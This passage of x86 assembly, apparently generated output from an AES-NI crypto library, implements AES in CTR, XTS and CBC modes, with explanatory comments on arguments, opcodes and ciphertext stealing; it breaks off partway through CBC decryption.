pxor xmm7,xmm6
shl ecx,4
mov ebx,16
movdqa [32+esp],xmm7
mov ebp,edx
sub ebx,ecx
lea edx,[32+ecx*1+edx]
sub eax,6
jmp NEAR L$041ctr32_loop6
align 16
L$041ctr32_loop6:
pshufd xmm4,xmm0,64
movdqa xmm0,[32+esp]
pshufd xmm5,xmm1,192
pxor xmm2,xmm0
pshufd xmm6,xmm1,128
pxor xmm3,xmm0
pshufd xmm7,xmm1,64
movups xmm1,[16+ebp]
pxor xmm4,xmm0
pxor xmm5,xmm0
db 102,15,56,220,209
pxor xmm6,xmm0
pxor xmm7,xmm0
db 102,15,56,220,217
movups xmm0,[32+ebp]
mov ecx,ebx
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
call L$_aesni_encrypt6_enter
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,xmm1
movups xmm1,[32+esi]
xorps xmm3,xmm0
movups [edi],xmm2
movdqa xmm0,[16+esp]
xorps xmm4,xmm1
movdqa xmm1,[64+esp]
movups [16+edi],xmm3
movups [32+edi],xmm4
paddd xmm1,xmm0
paddd xmm0,[48+esp]
movdqa xmm2,[esp]
movups xmm3,[48+esi]
movups xmm4,[64+esi]
xorps xmm5,xmm3
movups xmm3,[80+esi]
lea esi,[96+esi]
movdqa [48+esp],xmm0
db 102,15,56,0,194
xorps xmm6,xmm4
movups [48+edi],xmm5
xorps xmm7,xmm3
movdqa [64+esp],xmm1
db 102,15,56,0,202
movups [64+edi],xmm6
pshufd xmm2,xmm0,192
movups [80+edi],xmm7
lea edi,[96+edi]
pshufd xmm3,xmm0,128
sub eax,6
jnc NEAR L$041ctr32_loop6
add eax,6
jz NEAR L$042ctr32_ret
movdqu xmm7,[ebp]
mov edx,ebp
pxor xmm7,[32+esp]
mov ecx,DWORD [240+ebp]
L$040ctr32_tail:
por xmm2,xmm7
cmp eax,2
jb NEAR L$043ctr32_one
pshufd xmm4,xmm0,64
por xmm3,xmm7
je NEAR L$044ctr32_two
pshufd xmm5,xmm1,192
por xmm4,xmm7
cmp eax,4
jb NEAR L$045ctr32_three
pshufd xmm6,xmm1,128
por xmm5,xmm7
je NEAR L$046ctr32_four
por xmm6,xmm7
call __aesni_encrypt6
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,xmm1
movups xmm1,[32+esi]
xorps xmm3,xmm0
movups xmm0,[48+esi]
xorps xmm4,xmm1
movups xmm1,[64+esi]
xorps xmm5,xmm0
movups [edi],xmm2
xorps xmm6,xmm1
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$042ctr32_ret
align 16
L$039ctr32_one_shortcut:
movups xmm2,[ebx]
mov ecx,DWORD [240+edx]
L$043ctr32_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$047enc1_loop_7:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$047enc1_loop_7
db 102,15,56,221,209
movups xmm6,[esi]
xorps xmm6,xmm2
movups [edi],xmm6
jmp NEAR L$042ctr32_ret
align 16
L$044ctr32_two:
call __aesni_encrypt2
movups xmm5,[esi]
movups xmm6,[16+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$042ctr32_ret
align 16
L$045ctr32_three:
call __aesni_encrypt3
movups xmm5,[esi]
movups xmm6,[16+esi]
xorps xmm2,xmm5
movups xmm7,[32+esi]
xorps xmm3,xmm6
movups [edi],xmm2
xorps xmm4,xmm7
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$042ctr32_ret
align 16
L$046ctr32_four:
call __aesni_encrypt4
movups xmm6,[esi]
movups xmm7,[16+esi]
movups xmm1,[32+esi]
xorps xmm2,xmm6
movups xmm0,[48+esi]
xorps xmm3,xmm7
movups [edi],xmm2
xorps xmm4,xmm1
movups [16+edi],xmm3
xorps xmm5,xmm0
movups [32+edi],xmm4
movups [48+edi],xmm5
L$042ctr32_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
mov esp,DWORD [80+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_xts_encrypt
align 16
_aes_hw_xts_encrypt:
L$_aes_hw_xts_encrypt_begin:
push ebp
push ebx
push esi
push edi
mov edx,DWORD [36+esp]
mov esi,DWORD [40+esp]
mov ecx,DWORD [240+edx]
movups xmm2,[esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$048enc1_loop_8:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$048enc1_loop_8
db 102,15,56,221,209
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebp,esp
sub esp,120
mov ecx,DWORD [240+edx]
and esp,-16
mov DWORD [96+esp],135
mov DWORD [100+esp],0
mov DWORD [104+esp],1
mov DWORD [108+esp],0
mov DWORD [112+esp],eax
mov DWORD [116+esp],ebp
movdqa xmm1,xmm2
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
pcmpgtd xmm0,xmm1
and eax,-16
mov ebp,edx
mov ebx,ecx
sub eax,96
jc NEAR L$049xts_enc_short
shl ecx,4
mov ebx,16
sub ebx,ecx
lea edx,[32+ecx*1+edx]
jmp NEAR L$050xts_enc_loop6
align 16
L$050xts_enc_loop6:
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [16+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [32+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm7,xmm0,19
movdqa [64+esp],xmm1
paddq xmm1,xmm1
movups xmm0,[ebp]
pand xmm7,xmm3
movups xmm2,[esi]
pxor xmm7,xmm1
mov ecx,ebx
movdqu xmm3,[16+esi]
xorps xmm2,xmm0
movdqu xmm4,[32+esi]
pxor xmm3,xmm0
movdqu xmm5,[48+esi]
pxor xmm4,xmm0
movdqu xmm6,[64+esi]
pxor xmm5,xmm0
movdqu xmm1,[80+esi]
pxor xmm6,xmm0
lea esi,[96+esi]
pxor xmm2,[esp]
movdqa [80+esp],xmm7
pxor xmm7,xmm1
movups xmm1,[16+ebp]
pxor xmm3,[16+esp]
pxor xmm4,[32+esp]
db 102,15,56,220,209
pxor xmm5,[48+esp]
pxor xmm6,[64+esp]
db 102,15,56,220,217
pxor xmm7,xmm0
movups xmm0,[32+ebp]
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
call L$_aesni_encrypt6_enter
movdqa xmm1,[80+esp]
pxor xmm0,xmm0
xorps xmm2,[esp]
pcmpgtd xmm0,xmm1
xorps xmm3,[16+esp]
movups [edi],xmm2
xorps xmm4,[32+esp]
movups [16+edi],xmm3
xorps xmm5,[48+esp]
movups [32+edi],xmm4
xorps xmm6,[64+esp]
movups [48+edi],xmm5
xorps xmm7,xmm1
movups [64+edi],xmm6
pshufd xmm2,xmm0,19
movups [80+edi],xmm7
lea edi,[96+edi]
movdqa xmm3,[96+esp]
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
sub eax,96
jnc NEAR L$050xts_enc_loop6
mov ecx,DWORD [240+ebp]
mov edx,ebp
mov ebx,ecx
L$049xts_enc_short:
add eax,96
jz NEAR L$051xts_enc_done6x
movdqa xmm5,xmm1
cmp eax,32
jb NEAR L$052xts_enc_one
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
je NEAR L$053xts_enc_two
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
cmp eax,64
jb NEAR L$054xts_enc_three
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm7,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
movdqa [esp],xmm5
movdqa [16+esp],xmm6
je NEAR L$055xts_enc_four
movdqa [32+esp],xmm7
pshufd xmm7,xmm0,19
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm7,xmm3
pxor xmm7,xmm1
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
pxor xmm2,[esp]
movdqu xmm5,[48+esi]
pxor xmm3,[16+esp]
movdqu xmm6,[64+esi]
pxor xmm4,[32+esp]
lea esi,[80+esi]
pxor xmm5,[48+esp]
movdqa [64+esp],xmm7
pxor xmm6,xmm7
call __aesni_encrypt6
movaps xmm1,[64+esp]
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,[32+esp]
movups [edi],xmm2
xorps xmm5,[48+esp]
movups [16+edi],xmm3
xorps xmm6,xmm1
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
lea edi,[80+edi]
jmp NEAR L$056xts_enc_done
align 16
L$052xts_enc_one:
movups xmm2,[esi]
lea esi,[16+esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$057enc1_loop_9:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$057enc1_loop_9
db 102,15,56,221,209
xorps xmm2,xmm5
movups [edi],xmm2
lea edi,[16+edi]
movdqa xmm1,xmm5
jmp NEAR L$056xts_enc_done
align 16
L$053xts_enc_two:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
lea esi,[32+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
call __aesni_encrypt2
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
lea edi,[32+edi]
movdqa xmm1,xmm6
jmp NEAR L$056xts_enc_done
align 16
L$054xts_enc_three:
movaps xmm7,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
lea esi,[48+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
call __aesni_encrypt3
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
lea edi,[48+edi]
movdqa xmm1,xmm7
jmp NEAR L$056xts_enc_done
align 16
L$055xts_enc_four:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
xorps xmm2,[esp]
movups xmm5,[48+esi]
lea esi,[64+esi]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
xorps xmm5,xmm6
call __aesni_encrypt4
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
movups [edi],xmm2
xorps xmm5,xmm6
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
lea edi,[64+edi]
movdqa xmm1,xmm6
jmp NEAR L$056xts_enc_done
align 16
L$051xts_enc_done6x:
mov eax,DWORD [112+esp]
and eax,15
jz NEAR L$058xts_enc_ret
movdqa xmm5,xmm1
mov DWORD [112+esp],eax
jmp NEAR L$059xts_enc_steal
align 16
L$056xts_enc_done:
mov eax,DWORD [112+esp]
pxor xmm0,xmm0
and eax,15
jz NEAR L$058xts_enc_ret
pcmpgtd xmm0,xmm1
mov DWORD [112+esp],eax
pshufd xmm5,xmm0,19
paddq xmm1,xmm1
pand xmm5,[96+esp]
pxor xmm5,xmm1
L$059xts_enc_steal:
movzx ecx,BYTE [esi]
movzx edx,BYTE [edi-16]
lea esi,[1+esi]
mov BYTE [edi-16],cl
mov BYTE [edi],dl
lea edi,[1+edi]
sub eax,1
jnz NEAR L$059xts_enc_steal
sub edi,DWORD [112+esp]
mov edx,ebp
mov ecx,ebx
movups xmm2,[edi-16]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$060enc1_loop_10:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$060enc1_loop_10
db 102,15,56,221,209
xorps xmm2,xmm5
movups [edi-16],xmm2
L$058xts_enc_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
movdqa [esp],xmm0
pxor xmm3,xmm3
movdqa [16+esp],xmm0
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
movdqa [80+esp],xmm0
mov esp,DWORD [116+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_xts_decrypt
align 16
_aes_hw_xts_decrypt:
L$_aes_hw_xts_decrypt_begin:
; AES-NI XTS-mode decryption (auto-generated perlasm-style output; the
; instruction stream is deliberately interleaved for scheduling -- do not
; reorder by hand).
; Stack arguments (after the four pushes below): [20+esp]=in, [24+esp]=out,
; [28+esp]=len, [32+esp]=key1 (data key), [36+esp]=key2 (tweak key),
; [40+esp]=iv (initial tweak, 16 bytes).
; The hand-encoded "db 102,15,56,..." sequences are AES-NI opcodes:
; 220=aesenc, 221=aesenclast, 222=aesdec, 223=aesdeclast.
push ebp
push ebx
push esi
push edi
mov edx,DWORD [36+esp]
mov esi,DWORD [40+esp]
mov ecx,DWORD [240+edx]
; Encrypt the IV with key2 to produce the initial XTS tweak (xmm1 below).
movups xmm2,[esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$061enc1_loop_11:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$061enc1_loop_11
db 102,15,56,221,209
; Load in/out/len/key1 and carve an aligned 120-byte scratch frame.
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebp,esp
sub esp,120
and esp,-16
; If len is not a multiple of 16, hold back one block for ciphertext stealing.
xor ebx,ebx
test eax,15
setnz bl
shl ebx,4
sub eax,ebx
; [96+esp] = GF(2^128) reduction constant 0x87 used to step the tweak.
mov DWORD [96+esp],135
mov DWORD [100+esp],0
mov DWORD [104+esp],1
mov DWORD [108+esp],0
mov DWORD [112+esp],eax
mov DWORD [116+esp],ebp
mov ecx,DWORD [240+edx]
mov ebp,edx
mov ebx,ecx
movdqa xmm1,xmm2
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
pcmpgtd xmm0,xmm1
and eax,-16
sub eax,96
jc NEAR L$062xts_dec_short
shl ecx,4
mov ebx,16
sub ebx,ecx
lea edx,[32+ecx*1+edx]
jmp NEAR L$063xts_dec_loop6
align 16
; Main loop: derive six consecutive tweaks (doubling in GF(2^128)), stash
; them on the stack, then decrypt six blocks in parallel.
L$063xts_dec_loop6:
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [16+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [32+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm7,xmm0,19
movdqa [64+esp],xmm1
paddq xmm1,xmm1
movups xmm0,[ebp]
pand xmm7,xmm3
movups xmm2,[esi]
pxor xmm7,xmm1
mov ecx,ebx
movdqu xmm3,[16+esi]
xorps xmm2,xmm0
movdqu xmm4,[32+esi]
pxor xmm3,xmm0
movdqu xmm5,[48+esi]
pxor xmm4,xmm0
movdqu xmm6,[64+esi]
pxor xmm5,xmm0
movdqu xmm1,[80+esi]
pxor xmm6,xmm0
lea esi,[96+esi]
pxor xmm2,[esp]
movdqa [80+esp],xmm7
pxor xmm7,xmm1
movups xmm1,[16+ebp]
pxor xmm3,[16+esp]
pxor xmm4,[32+esp]
db 102,15,56,222,209
pxor xmm5,[48+esp]
pxor xmm6,[64+esp]
db 102,15,56,222,217
pxor xmm7,xmm0
movups xmm0,[32+ebp]
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
call L$_aesni_decrypt6_enter
; XOR the tweaks back in and store six plaintext blocks.
movdqa xmm1,[80+esp]
pxor xmm0,xmm0
xorps xmm2,[esp]
pcmpgtd xmm0,xmm1
xorps xmm3,[16+esp]
movups [edi],xmm2
xorps xmm4,[32+esp]
movups [16+edi],xmm3
xorps xmm5,[48+esp]
movups [32+edi],xmm4
xorps xmm6,[64+esp]
movups [48+edi],xmm5
xorps xmm7,xmm1
movups [64+edi],xmm6
pshufd xmm2,xmm0,19
movups [80+edi],xmm7
lea edi,[96+edi]
movdqa xmm3,[96+esp]
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
sub eax,96
jnc NEAR L$063xts_dec_loop6
mov ecx,DWORD [240+ebp]
mov edx,ebp
mov ebx,ecx
; Fewer than 96 whole bytes remain: dispatch on 1..5 leftover blocks.
L$062xts_dec_short:
add eax,96
jz NEAR L$064xts_dec_done6x
movdqa xmm5,xmm1
cmp eax,32
jb NEAR L$065xts_dec_one
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
je NEAR L$066xts_dec_two
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
cmp eax,64
jb NEAR L$067xts_dec_three
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm7,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
movdqa [esp],xmm5
movdqa [16+esp],xmm6
je NEAR L$068xts_dec_four
; Five blocks left.
movdqa [32+esp],xmm7
pshufd xmm7,xmm0,19
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm7,xmm3
pxor xmm7,xmm1
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
pxor xmm2,[esp]
movdqu xmm5,[48+esi]
pxor xmm3,[16+esp]
movdqu xmm6,[64+esi]
pxor xmm4,[32+esp]
lea esi,[80+esi]
pxor xmm5,[48+esp]
movdqa [64+esp],xmm7
pxor xmm6,xmm7
call __aesni_decrypt6
movaps xmm1,[64+esp]
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,[32+esp]
movups [edi],xmm2
xorps xmm5,[48+esp]
movups [16+edi],xmm3
xorps xmm6,xmm1
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
lea edi,[80+edi]
jmp NEAR L$069xts_dec_done
align 16
; One block left.
L$065xts_dec_one:
movups xmm2,[esi]
lea esi,[16+esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$070dec1_loop_12:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$070dec1_loop_12
db 102,15,56,223,209
xorps xmm2,xmm5
movups [edi],xmm2
lea edi,[16+edi]
movdqa xmm1,xmm5
jmp NEAR L$069xts_dec_done
align 16
; Two blocks left.
L$066xts_dec_two:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
lea esi,[32+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
call __aesni_decrypt2
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
lea edi,[32+edi]
movdqa xmm1,xmm6
jmp NEAR L$069xts_dec_done
align 16
; Three blocks left.
L$067xts_dec_three:
movaps xmm7,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
lea esi,[48+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
call __aesni_decrypt3
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
lea edi,[48+edi]
movdqa xmm1,xmm7
jmp NEAR L$069xts_dec_done
align 16
; Four blocks left.
L$068xts_dec_four:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
xorps xmm2,[esp]
movups xmm5,[48+esi]
lea esi,[64+esi]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
xorps xmm5,xmm6
call __aesni_decrypt4
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
movups [edi],xmm2
xorps xmm5,xmm6
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
lea edi,[64+edi]
movdqa xmm1,xmm6
jmp NEAR L$069xts_dec_done
align 16
; The 6x loop consumed everything block-aligned; only the stolen tail
; (if any) remains.
L$064xts_dec_done6x:
mov eax,DWORD [112+esp]
and eax,15
jz NEAR L$071xts_dec_ret
mov DWORD [112+esp],eax
jmp NEAR L$072xts_dec_only_one_more
align 16
L$069xts_dec_done:
mov eax,DWORD [112+esp]
pxor xmm0,xmm0
and eax,15
jz NEAR L$071xts_dec_ret
; Advance the tweak once more before handling the stolen tail.
pcmpgtd xmm0,xmm1
mov DWORD [112+esp],eax
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
L$072xts_dec_only_one_more:
pshufd xmm5,xmm0,19
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm5,xmm3
pxor xmm5,xmm1
mov edx,ebp
mov ecx,ebx
; Decrypt the second-to-last block with the *last* tweak (XTS stealing).
movups xmm2,[esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$073dec1_loop_13:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$073dec1_loop_13
db 102,15,56,223,209
xorps xmm2,xmm5
movups [edi],xmm2
; Ciphertext stealing: swap the partial tail bytes byte by byte.
L$074xts_dec_steal:
movzx ecx,BYTE [16+esi]
movzx edx,BYTE [edi]
lea esi,[1+esi]
mov BYTE [edi],cl
mov BYTE [16+edi],dl
lea edi,[1+edi]
sub eax,1
jnz NEAR L$074xts_dec_steal
sub edi,DWORD [112+esp]
mov edx,ebp
mov ecx,ebx
; Re-decrypt the reassembled block with the previous tweak (xmm6).
movups xmm2,[edi]
xorps xmm2,xmm6
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$075dec1_loop_14:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$075dec1_loop_14
db 102,15,56,223,209
xorps xmm2,xmm6
movups [edi],xmm2
; Scrub XMM registers and the stack scratch area, restore esp, return.
L$071xts_dec_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
movdqa [esp],xmm0
pxor xmm3,xmm3
movdqa [16+esp],xmm0
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
movdqa [80+esp],xmm0
mov esp,DWORD [116+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_cbc_encrypt
align 16
_aes_hw_cbc_encrypt:
L$_aes_hw_cbc_encrypt_begin:
; AES-NI CBC encrypt/decrypt (auto-generated perlasm-style output).
; Stack arguments (after the four pushes): [20+esp]=in, [24+esp]=out,
; [28+esp]=len, [32+esp]=key, [36+esp]=ivec, [40+esp]=enc flag
; (non-zero => encrypt, zero => decrypt).
; db 102,15,56,220/221/222/223 = aesenc/aesenclast/aesdec/aesdeclast.
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov ebx,esp
mov edi,DWORD [24+esp]
sub ebx,24
mov eax,DWORD [28+esp]
and ebx,-16
mov edx,DWORD [32+esp]
mov ebp,DWORD [36+esp]
test eax,eax
jz NEAR L$076cbc_abort
cmp DWORD [40+esp],0
xchg ebx,esp
movups xmm7,[ebp]
mov ecx,DWORD [240+edx]
mov ebp,edx
mov DWORD [16+esp],ebx
mov ebx,ecx
je NEAR L$077cbc_decrypt
; ---- CBC encryption: inherently serial, one block at a time ----
movaps xmm2,xmm7
cmp eax,16
jb NEAR L$078cbc_enc_tail
sub eax,16
jmp NEAR L$079cbc_enc_loop
align 16
L$079cbc_enc_loop:
movups xmm7,[esi]
lea esi,[16+esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
xorps xmm7,xmm0
lea edx,[32+edx]
xorps xmm2,xmm7
L$080enc1_loop_15:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$080enc1_loop_15
db 102,15,56,221,209
mov ecx,ebx
mov edx,ebp
movups [edi],xmm2
lea edi,[16+edi]
sub eax,16
jnc NEAR L$079cbc_enc_loop
add eax,16
jnz NEAR L$078cbc_enc_tail
movaps xmm7,xmm2
pxor xmm2,xmm2
jmp NEAR L$081cbc_ret
; Partial final block: copy the tail into place and zero-pad it, then loop
; once more to encrypt it.
L$078cbc_enc_tail:
mov ecx,eax
; dd 2767451785 = 0xA4F3F689: "mov esi,esi ; rep movsb" (copy tail bytes)
dd 2767451785
mov ecx,16
sub ecx,eax
xor eax,eax
; dd 2868115081 = 0xAAF3F689: "mov esi,esi ; rep stosb" (zero-pad block)
dd 2868115081
lea edi,[edi-16]
mov ecx,ebx
mov esi,edi
mov edx,ebp
jmp NEAR L$079cbc_enc_loop
align 16
; ---- CBC decryption: parallelizable, six blocks at a time ----
L$077cbc_decrypt:
cmp eax,80
jbe NEAR L$082cbc_dec_tail
movaps [esp],xmm7
sub eax,80
jmp NEAR L$083cbc_dec_loop6_enter
align 16
L$084cbc_dec_loop6:
movaps [esp],xmm0
movups [edi],xmm7
lea edi,[16+edi]
L$083cbc_dec_loop6_enter:
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
call __aesni_decrypt6
; XOR each decrypted block with the previous ciphertext block (the saved
; IV at [esp] for the first one).
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,[esp]
xorps xmm3,xmm1
movups xmm1,[32+esi]
xorps xmm4,xmm0
movups xmm0,[48+esi]
xorps xmm5,xmm1
movups xmm1,[64+esi]
xorps xmm6,xmm0
movups xmm0,[80+esi]
xorps xmm7,xmm1
movups [edi],xmm2
movups [16+edi],xmm3
lea esi,[96+esi]
movups [32+edi],xmm4
mov ecx,ebx
movups [48+edi],xmm5
mov edx,ebp
movups [64+edi],xmm6
lea edi,[80+edi]
sub eax,96
ja NEAR L$084cbc_dec_loop6
movaps xmm2,xmm7
movaps xmm7,xmm0
add eax,80
jle NEAR L$085cbc_dec_clear_tail_collected
movups [edi],xmm2
lea edi,[16+edi]
; At most five blocks remain; dispatch on the exact count.
L$082cbc_dec_tail:
movups xmm2,[esi]
movaps xmm6,xmm2
cmp eax,16
jbe NEAR L$086cbc_dec_one
movups xmm3,[16+esi]
movaps xmm5,xmm3
cmp eax,32
jbe NEAR L$087cbc_dec_two
movups xmm4,[32+esi]
cmp eax,48
jbe NEAR L$088cbc_dec_three
movups xmm5,[48+esi]
cmp eax,64
jbe NEAR L$089cbc_dec_four
movups xmm6,[64+esi]
movaps [esp],xmm7
movups xmm2,[esi]
xorps xmm7,xmm7
call __aesni_decrypt6
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,[esp]
xorps xmm3,xmm1
movups xmm1,[32+esi]
xorps xmm4,xmm0
movups xmm0,[48+esi]
xorps xmm5,xmm1
movups xmm7,[64+esi]
xorps xmm6,xmm0
